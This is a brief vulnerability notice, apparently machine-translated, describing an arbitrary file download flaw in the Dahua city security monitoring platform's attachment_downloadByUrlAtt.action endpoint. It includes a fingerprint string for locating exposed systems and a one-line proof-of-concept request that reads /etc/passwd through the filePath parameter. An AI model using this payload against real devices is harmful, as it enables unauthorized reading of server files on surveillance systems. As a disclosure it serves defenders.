Dahua Urban Security Monitoring System Platform Management Attachment_downloadbyurlatt Action Any File Download Vulnerability
Dahua Urban Security Monitoring System Platform Management Attachment_downloadbyurlatt Action Any File Download Vulnerability
Dahua Urban Security Monitoring System Platform Management attachment_downloadByUrlAtt.action Any file download vulnerability
Vulnerability Description
There is a vulnerability to download any file on the server through the platform management of Dahua City Security Monitoring System.
Vulnerability Impact
Dahua City Security Monitoring System Platform Management
Network surveying and mapping
“attachment_downloadByUrlAtt.action”
Vulnerability reappears
Login page
Verify POC
1
/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
This post is licensed under CC BY 4.0 by the author.